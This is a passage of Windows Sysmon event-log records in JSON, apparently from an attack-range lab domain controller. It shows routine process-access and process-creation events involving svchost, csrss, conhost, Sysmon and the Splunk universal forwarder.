ll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5701,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5702,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5703,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5704,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:52.360\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02FA-5F25-0000-00100C370600}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:52.360","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02FA-5F25-0000-00100C370600}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5705,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.878\r\nProcessGuid: {A837DB8D-0335-5F25-0000-0010FDC70A00}\r\nProcessId: 2576\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.878","ProcessGuid":"{A837DB8D-0335-5F25-0000-0010FDC70A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5706,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0335-5F25-0000-0010FDC70A00}\r\nTargetProcessId: 2576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0335-5F25-0000-0010FDC70A00}","TargetProcessId":"2576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5707,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0335-5F25-0000-0010FDC70A00}\r\nTargetProcessId: 2576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0335-5F25-0000-0010FDC70A00}","TargetProcessId":"2576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5708,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:53.875","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5709,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:53.875\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 